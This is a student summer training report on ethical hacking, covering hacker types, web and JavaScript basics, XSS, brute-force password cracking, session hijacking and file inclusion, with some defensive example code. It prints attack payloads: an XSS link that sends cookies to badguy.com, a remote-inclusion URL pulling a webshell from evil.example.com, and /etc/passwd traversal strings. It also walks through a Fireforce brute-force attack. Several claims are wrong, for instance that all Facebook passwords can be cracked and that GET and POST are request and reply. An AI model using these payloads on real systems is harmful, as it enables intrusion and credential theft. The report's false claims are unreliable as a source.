SUMMER TRAINING REPORT
SUBMITTED BY:
DEVPRIYO RAY
CSE-A, 3RD YEAR (VTH SEMESTER)
REG. NO-1031330059
INTRODUCTION
ANONYMOUS
As for the literal operation of Anonymous, becoming part of it is as simple as going onto its Internet Relay Chat forums and typing away.
The real-life people involved in Anonymous could be behind their laptops anywhere, from an Internet café in Malaysia to a Michigan suburb.
Anonymous appears to have no spokesperson or leader.
One could participate for a minute or a day in a chat room, and then never go back again.
Anonymous is the future form of Internet-based social activism. They laud the "hacktivists" for their actions.
WHY DO PEOPLE HACK?
To make security stronger (ethical hacking)
Just for fun
To show off
To break into other systems secretly
To broadcast their views to many people
To steal important information
To destroy an enemy's computer network during a war
WHAT IS ETHICAL HACKING?
Also called attack and penetration testing, white-hat hacking, or red teaming:
• It is legal
• Permission is obtained from the target
• It is part of an overall security program
• It identifies vulnerabilities visible from the Internet
Ethical hackers possess the same skills, mindset and tools as a hacker, but the attacks are carried out in a non-destructive manner.
Hacking
The process of breaking into systems for:
Personal or commercial gain
Malicious intent, causing severe damage to information and assets
Ethical hacking, by contrast, conforms to accepted professional standards of conduct.
TYPES OF HACKERS
White Hat Hackers:
A white hat is a hacker who specializes in penetration testing and other testing methodologies to ensure the security of an organization's information systems.
Black Hat Hackers:
A black hat is the villain or bad guy, especially in a western movie, in which such a character would stereotypically wear a black hat in contrast to the hero's white hat.
Grey Hat Hackers:
A grey hat, in the hacking community, refers to a skilled hacker whose activities fall somewhere between those of white hat and black hat hackers on a variety of spectra.
Why Can't We Defend Against Hackers?
There are many unknown, insecure holes in the system.
Hackers need to know only one loophole in the system.
Administrators need to know all the loopholes to defend the system.
Why Do We Need Ethical Hacking?
TYPES OF ATTACKS
Various kinds of possible attacks on a computer system are:
Denial of service attack
Brute force attack
Cross site scripting (XSS)
File inclusion (or file upload), and many more.
WEB BASICS AND SECURITY
WEB APPLICATIONS:
Big trend: software as a (Web-based) service
Online banking, shopping, government, bill payment, tax preparation, customer relationship management, etc.
Cloud computing
Applications hosted on Web servers
Written in a mixture of PHP, Java, Perl, Python, C, ASP
Security is rarely the main concern
Poorly written scripts with inadequate input validation
Sensitive data stored in world-readable files
Recent push from Visa and MasterCard to improve the security of data management (PCI standard)
TYPICAL WEB APPLICATION DESIGN:
A web application is designed keeping in mind the following things:
Runs on a Web server or application server
Takes input from Web users (via the Web server)
Interacts with back-end databases and third parties
Prepares and outputs results for users (via the Web server)
• Dynamically generated HTML pages
• Contain content from many different sources, often including regular users
– Blogs, social networks, photo-sharing websites…
BROWSER AND NETWORK:
A browser basically interacts with the network. It sends a request to the network according to the need of the user (using the GET method). The reply to the request sent is displayed in the browser (using the POST method).
BASIC EXECUTION MODEL OF A BROWSER:
Each browser window or frame:
• Loads content
• Renders
– Processes HTML and scripts to display the page
– May involve images, subframes, etc.
• Responds to events
Events
• User actions: OnClick, OnMouseover
• Rendering: OnLoad
• Timing: setTimeout(), clearTimeout()
HTML AND SCRIPTS:
EXAMPLE
<html>
…
<p> The script on this page adds two numbers </p>
<script>
  var num1, num2, sum;
  num1 = prompt("Enter first number");
  num2 = prompt("Enter second number");
  // parse both inputs as base-10 integers before adding them
  sum = parseInt(num1, 10) + parseInt(num2, 10);
  alert("Sum = " + sum);
</script>
…
</html>
EVENT DRIVEN SCRIPT EXECUTION:
EXAMPLE
<script type="text/javascript">
  // DOM MouseEvent.button: 0 = left (primary), 1 = middle, 2 = right
  function whichButton(event) {
    if (event.button === 0) {
      alert("You clicked the left mouse button!");
    } else if (event.button === 2) {
      alert("You clicked the right mouse button!");
    } else {
      alert("You clicked the middle mouse button!");
    }
  }
</script>
…
<body onmousedown="whichButton(event)">
…
</body>
OUTPUT:
JAVASCRIPT:
Language executed by the browser
• Scripts are embedded in Web pages
• Can run before the HTML is loaded, before the page is viewed, while it is being viewed, or when leaving the page
Used to implement "active" web pages
• AJAX, a huge number of Web-based applications
An attacker gets to execute code on the user's machine
• Often used to exploit other vulnerabilities
"The world's most misunderstood programming language"
JAVASCRIPT IN WEBPAGES:
Embedded in an HTML page as a <script> element
• JavaScript written directly inside the <script> element
– <script> alert("Hello World!") </script>
• Linked file as the src attribute of the <script> element
<script type="text/javascript" src="functions.js"></script>
Event handler attribute
<a href="http://www.yahoo.com" onmouseover="alert('hi');">
Pseudo-URL referenced by a link
<a href="javascript:alert('You clicked');">Click me</a>
JAVASCRIPT SECURITY MODEL:
Script runs in a "sandbox"
• No direct file access, restricted network access
Same-origin policy
• Can only read properties of documents and windows from the same server, protocol, and port
• If the same server hosts unrelated sites, scripts from one site can access document properties on the other
User can grant privileges to signed scripts
• UniversalBrowserRead/Write, UniversalFileRead, UniversalSendMail
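The same-origin rule above, as an added example that is not part of the original report: two URLs share an origin only when scheme, host and port all match, which is also why two unrelated sites on one shared host end up in the same origin. The URLs below are constructed samples.

```javascript
// Added example: the same-origin comparison a browser applies before letting a
// script read another document's properties. Path, query and fragment are
// ignored; scheme, host and port must all match.
function originOf(urlString) {
  // URL.origin serialises scheme://host[:port]; a default port (80 for http,
  // 443 for https) is omitted, so explicit and implicit defaults compare equal.
  return new URL(urlString).origin;
}

function sameOrigin(a, b) {
  return originOf(a) === originOf(b);
}

// Constructed sample pairs: [urlA, urlB, expectedSameOrigin]
const CASES = [
  // same scheme/host/port, different path: same origin
  ['http://example.test/blog/index.html', 'http://example.test/photos/', true],
  // different scheme (http vs https): different origin
  ['http://example.test/', 'https://example.test/', false],
  // different port on the same host: different origin
  ['http://example.test/', 'http://example.test:8080/', false],
  // explicit default port equals the implicit one: same origin
  ['http://example.test/', 'http://example.test:80/', true],
  // a subdomain is a different host: different origin
  ['http://example.test/', 'http://www.example.test/', false],
  // two unrelated sites served from one scheme/host/port are the SAME
  // origin, which is the shared-hosting pitfall the report points out
  ['http://shared.test/siteA/', 'http://shared.test/siteB/', true],
];

// Evaluate every pair and report whether the result matched expectations.
function runCases(cases) {
  return cases.map(([a, b, expected]) => ({ a, b, expected, actual: sameOrigin(a, b) }));
}

for (const r of runCases(CASES)) {
  console.log(`${r.actual === r.expected ? 'ok ' : 'BAD'} ${r.a} vs ${r.b} -> ${r.actual}`);
}
```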
REMOTE SCRIPTING:
Goal: exchange data between a client-side app in a browser and a server-side app (without reloading the page)
Methods
• Java applet or ActiveX control or Flash
– Can make HTTP requests and interact with client-side JavaScript code, but requires LiveConnect (not available on all browsers)
• XML-RPC
– Open, standards-based technology that requires XML-RPC libraries on your server and in client-side code
• Simple HTTP via a hidden IFRAME
– An IFRAME with a script on your web server (or a database of static HTML files) is by far the easiest remote scripting option
REMOTE SCRIPTING EXAMPLE:
client.html: pass arguments to server.html
<script type="text/javascript">
  function handleResponse() {
    alert('this function is called from server.html');
  }
</script>
<iframe id="RSIFrame" name="RSIFrame" style="width:0px; height:0px; border: 0px" src="blank.html">
</iframe>
<a href="server.html" target="RSIFrame">make RPC call</a>
server.html: could be a PHP app, anything
<script type="text/javascript">
  window.parent.handleResponse();
</script>
CROSS SITE SCRIPTING (XSS)
WHAT IS XSS?
An XSS vulnerability is present when an attacker can inject scripting code into pages generated by a web application.
Methods for injecting malicious code:
Reflected XSS ("type 1")
The attack script is reflected back to the user as part of a page from the victim site.
Stored XSS ("type 2")
The attacker stores the malicious code in a resource managed by the web application, such as a database.
Others, such as DOM-based attacks
XSS EXAMPLE:
Search field on victim.com:
http://victim.com/search.php?term=apple
Server-side implementation of search.php:
<HTML> <TITLE> Search Results </TITLE>
<BODY>
Results for <?php echo $_GET['term'] ?> (echoes the search term in the response)
. . .
</BODY> </HTML>
Now consider the link
http://victim.com/search.php?term=<script>window.open("http://badguy.com?cookie=" + document.cookie)</script>
What if the user clicks on this link?
1. The browser goes to victim.com/search.php
2. victim.com returns
<HTML> Results for <script> … </script>
3. The browser executes the script:
It sends badguy.com the cookie for victim.com
OUTPUT:
REFLECTED XSS:
STORED XSS:
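The fix for the search.php example above is output encoding. As an added example (not code from the original report), the response is rebuilt as two JavaScript template functions, one echoing the term raw like the PHP snippet and one HTML-encoding it first, and both are fed the cookie-stealing term from the walkthrough. The tag names and the `containsScriptTag` marker are assumptions of this example.

```javascript
// Added example: reflected XSS in the search page, vulnerable and hardened.

// Encode the five characters that can change HTML structure or break out of
// an attribute value. This is an encoder for HTML text/attribute context; a
// URL or JavaScript context would need a different one.
function escapeHtml(s) {
  return String(s).replace(/[&<>"']/g, (c) => ({
    '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;',
  })[c]);
}

// Mirrors "Results for <?php echo $_GET['term'] ?>": user input lands in the
// page unchanged, so a term containing markup becomes markup.
function renderSearchUnsafe(term) {
  return `<HTML><TITLE>Search Results</TITLE><BODY>Results for ${term}</BODY></HTML>`;
}

// Hardened version: the term is still displayed, but only ever as text.
function renderSearchSafe(term) {
  return `<HTML><TITLE>Search Results</TITLE><BODY>Results for ${escapeHtml(term)}</BODY></HTML>`;
}

// Crude marker used only to make the difference between the two renderers
// visible: does the response contain an opening script tag?
function containsScriptTag(html) {
  return /<script\b/i.test(html);
}

// The term from the report's malicious link, as the server sees it after the
// query string has been URL-decoded (constructed sample input).
const PAYLOAD_TERM =
  '<script>window.open("http://badguy.com?cookie=" + document.cookie)</script>';

console.log('unsafe:', renderSearchUnsafe(PAYLOAD_TERM));
console.log('safe:  ', renderSearchSafe(PAYLOAD_TERM));
```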
CRACKING
Cracking is the procedure of obtaining the passwords of certain documents, files, etc. using illegal means. However, in the case of penetration testing, cracking is not illegal: it is done with the consent of the required authorities.
Various methods are used to crack passwords, such as brute force attacks, dictionary attacks, social engineering, etc.
EXAMPLE OF A BRUTE FORCE ATTACK USING FIREFORCE:
Fireforce is an add-on for Mozilla Firefox used for cracking passwords. After installing this add-on, the following procedure is followed:
Launching the attack:
We want the password for the user 'admin'.
1) Fill the username field with 'admin'
2) Right-click in the Password field and select: Fireforce > Generate Password > specify the type of password.
3) Enter the minimum length
4) Enter the maximum length
5) Enter the text that identifies a failed authentication
6) Enter the number of requests per second
Click on save and the passwords will be generated.
Using a little imagination, all the Facebook passwords can be cracked, but it largely depends upon the computing power of the CPU.
However, this method cannot be applied to crack Gmail passwords. Gmail passwords, however, can be simply cracked using a dictionary attack, which in turn requires a lot of computing power and is well beyond the scope of a normal PC.
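The defender's view of the procedure above, as an added example that is not part of the original report: a tool firing a chosen number of guesses per second at one login form leaves a burst of failed authentications from one source for one user. The log format, field names and thresholds below are assumptions of this example, and the log lines are constructed.

```javascript
// Added example: flag bursts of failed logins per (source, user) pair.
// Assumed log format: <ISO timestamp> LOGIN_<OK|FAIL> user=<name> src=<ip>
const LINE_RE = /^(\S+) LOGIN_(OK|FAIL) user=(\S+) src=(\S+)$/;

function parseLine(line) {
  const m = LINE_RE.exec(line.trim());
  if (!m) return null; // unrelated line
  return { ts: Date.parse(m[1]), ok: m[2] === 'OK', user: m[3], src: m[4] };
}

// Flag any (src, user) pair with >= threshold failures inside windowSec.
// Returns one alert per pair with the time of the first and last failure.
function detectBruteForce(lines, { windowSec = 60, threshold = 10 } = {}) {
  const fails = new Map(); // key -> failure timestamps (ms)
  for (const line of lines) {
    const ev = parseLine(line);
    if (!ev || ev.ok) continue;
    const key = `${ev.src}->${ev.user}`;
    if (!fails.has(key)) fails.set(key, []);
    fails.get(key).push(ev.ts);
  }
  const alerts = [];
  for (const [key, times] of fails) {
    times.sort((a, b) => a - b);
    let start = 0; // sliding window over the sorted timestamps
    for (let end = 0; end < times.length; end++) {
      while (times[end] - times[start] > windowSec * 1000) start++;
      if (end - start + 1 >= threshold) {
        alerts.push({ key, count: end - start + 1, first: times[start], last: times[end] });
        break; // one alert per pair is enough here
      }
    }
  }
  return alerts;
}

// Constructed sample: one user who mistyped once and then succeeded, plus
// 12 failures for "admin" from a single source within 12 seconds.
const SAMPLE_LOG = [
  '2024-05-01T09:00:00Z LOGIN_FAIL user=bob src=198.51.100.7',
  '2024-05-01T09:00:04Z LOGIN_OK user=bob src=198.51.100.7',
  ...Array.from({ length: 12 }, (_, i) =>
    `2024-05-01T09:01:${String(i).padStart(2, '0')}Z LOGIN_FAIL user=admin src=203.0.113.5`),
];

console.log(detectBruteForce(SAMPLE_LOG));
```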
SESSION HIJACKING
Session hijacking, sometimes also known as cookie hijacking, is the exploitation of a valid computer session, sometimes also called a session key, to gain unauthorized access to information or services in a computer system. In particular, it is used to refer to the theft of a magic cookie used to authenticate a user to a remote server. It has particular relevance to web developers, as the HTTP cookies used to maintain a session on many web sites can be easily stolen by an attacker using an intermediary computer or with access to the saved cookies on the victim's computer.
A popular method is using source-routed IP packets. This allows an attacker at point B on the network to participate in a conversation between A and C by encouraging the IP packets to pass through B's machine.
If source routing is turned off, the attacker can use "blind" hijacking, whereby it guesses the responses of the two machines. Thus, the attacker can send a command, but can never see the response. However, a common command would be to set a password allowing access from somewhere else on the net.
METHODS OF SESSION HIJACKING:
Session fixation, where the attacker sets a user's session id to one known to him, for example by sending the user an email with a link that contains a particular session id. The attacker now only has to wait until the user logs in.
Session sidejacking, where the attacker uses packet sniffing to read network traffic between two parties to steal the session cookie. Many web sites use SSL encryption for login pages to prevent attackers from seeing the password, but do not use encryption for the rest of the site once authenticated. This allows attackers that can read the network traffic to intercept all the data that is submitted to the server or web pages viewed by the client. Since this data includes the session cookie, it allows the attacker to impersonate the victim, even if the password itself is not compromised. Unsecured Wi-Fi hotspots are particularly vulnerable, as anyone sharing the network will generally be able to read most of the web traffic between other nodes and the access point.
Cross-site scripting, where the attacker tricks the user's computer into running code which is treated as trustworthy because it appears to belong to the server, allowing the attacker to obtain a copy of the cookie or perform other operations.
Malware and unwanted programs can use browser hijacking to steal a browser's cookie files without a user's knowledge, and then perform actions (like installing Android apps) without the user's knowledge. An attacker with physical access can simply attempt to steal the session key by, for example, obtaining the file or memory contents of the appropriate part of either the user's computer or the server.
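Two cookie attributes blunt two of the methods listed above: `Secure` keeps the session cookie off plain-HTTP requests (sidejacking on an open hotspot), and `HttpOnly` hides it from `document.cookie` (theft through cross-site scripting). As an added example that is not from the original report, this audits `Set-Cookie` header values for both; the session-cookie name pattern and the sample headers are assumptions constructed for the example.

```javascript
// Added example: audit Set-Cookie headers for the Secure and HttpOnly flags.

// Parse one Set-Cookie header value into name, value and a Map of attributes
// (attribute names lower-cased; flag attributes get the value true).
function parseSetCookie(header) {
  const [pair, ...attrs] = header.split(';').map((s) => s.trim());
  const eq = pair.indexOf('=');
  const name = eq >= 0 ? pair.slice(0, eq) : pair;
  const value = eq >= 0 ? pair.slice(eq + 1) : '';
  const attributes = new Map();
  for (const a of attrs) {
    const i = a.indexOf('=');
    const k = (i >= 0 ? a.slice(0, i) : a).toLowerCase();
    attributes.set(k, i >= 0 ? a.slice(i + 1) : true);
  }
  return { name, value, attributes };
}

// Cookie names that usually carry a session identifier (assumption).
const SESSION_NAME = /sess|sid|auth|token/i;

// Findings for one cookie; an empty list means nothing to report.
function auditCookie(header) {
  const c = parseSetCookie(header);
  const findings = [];
  if (!SESSION_NAME.test(c.name)) return findings; // not a session cookie
  if (!c.attributes.has('secure')) {
    findings.push(`${c.name}: missing Secure, will be sent over plain HTTP (sidejacking)`);
  }
  if (!c.attributes.has('httponly')) {
    findings.push(`${c.name}: missing HttpOnly, readable via document.cookie (XSS theft)`);
  }
  return findings;
}

function auditAll(headers) {
  return headers.flatMap(auditCookie);
}

// Constructed sample headers: one weak session cookie, one hardened one, and
// a preference cookie that carries no session and is therefore skipped.
const SAMPLE_HEADERS = [
  'PHPSESSID=abc123; Path=/',
  'sid=def456; Path=/; Secure; HttpOnly; SameSite=Lax',
  'theme=dark; Path=/; Max-Age=31536000',
];

for (const f of auditAll(SAMPLE_HEADERS)) console.log(f);
```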
FILE INCLUSION
A file inclusion vulnerability is a type of vulnerability most often found on websites. It allows an attacker to include a file, usually through a script on the web server. The vulnerability occurs due to the use of user-supplied input without proper validation. This can lead to something as minimal as outputting the contents of the file, or to more serious events such as:
Code execution on the web server
Code execution on the client side, such as JavaScript, which can lead to other attacks such as cross site scripting (XSS)
Denial of service (DoS)
Data theft/manipulation
TYPES OF INCLUSION:
1) REMOTE FILE INCLUSION
2) LOCAL FILE INCLUSION
EXAMPLE: Consider this PHP script, which includes a file specified by the request:
<?php
if ( isset( $_GET['COLOR'] ) ) {
    include( $_GET['COLOR'] . '.php' );
}
?>
<form method="get">
  <select name="COLOR">
    <option value="red">red</option>
    <option value="blue">blue</option>
  </select>
  <input type="submit">
</form>
The developer intended only blue.php and red.php to be used as options. But it is possible to inject code from other files, as anyone can insert arbitrary values for the COLOR parameter.
/vulnerable.php?COLOR=http://evil.example.com/webshell.txt? - injects a remotely hosted file containing malicious code.
/vulnerable.php?COLOR=C:\\ftp\\upload\\exploit - executes code from an already uploaded file called exploit.php (local file inclusion vulnerability).
/vulnerable.php?COLOR=C:\\notes.txt%00 - example using the NUL meta character to remove the .php suffix, allowing access to files other than .php. (Enabling magic_quotes_gpc limits the attack by escaping special characters, thus disabling the use of the NUL terminator.)
/vulnerable.php?COLOR=/etc/passwd%00 - allows an attacker to read the contents of the passwd file on a UNIX system (directory traversal).
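The root cause above is that the parameter value becomes a path. As an added example (not code from the original report), the include resolver is rewritten in JavaScript in two forms, the concatenation the PHP snippet performs and an allowlist that maps COLOR to one of the two intended files, and both are run over the four request values listed above with `%00` already decoded. The `classify` helper and its categories are assumptions of this example.

```javascript
// Added example: vulnerable include resolution beside an allowlisted one.

// Mirrors include($_GET['COLOR'] . '.php'): no validation at all.
function resolveIncludeUnsafe(color) {
  return color + '.php';
}

// Allowlist: the parameter selects an entry; it never becomes a path.
const ALLOWED = { red: 'red.php', blue: 'blue.php' };

function resolveIncludeSafe(color) {
  // hasOwnProperty guards against inherited keys such as "constructor"
  return Object.prototype.hasOwnProperty.call(ALLOWED, color) ? ALLOWED[color] : null;
}

// Classify what an unvalidated value would make include() do, using the
// three categories from the report's list of attack URLs.
function classify(color) {
  if (/^[a-z][a-z0-9+.-]*:\/\//i.test(color)) return 'remote';      // scheme:// (RFI)
  if (color.includes('\0')) return 'null-byte';                      // strips the .php suffix
  if (/^(\/|[a-z]:\\)|\.\.[\\/]/i.test(color)) return 'local-path';  // absolute path or traversal (LFI)
  return 'plain';
}

// The report's example values, with %00 URL-decoded into a NUL byte as the
// web server delivers it (constructed sample input).
const REQUESTS = [
  'red',
  'http://evil.example.com/webshell.txt?',
  'C:\\ftp\\upload\\exploit',
  'C:\\notes.txt\0',
  '/etc/passwd\0',
];

for (const c of REQUESTS) {
  console.log(JSON.stringify(c), classify(c),
    'unsafe ->', JSON.stringify(resolveIncludeUnsafe(c)),
    'safe ->', resolveIncludeSafe(c));
}
```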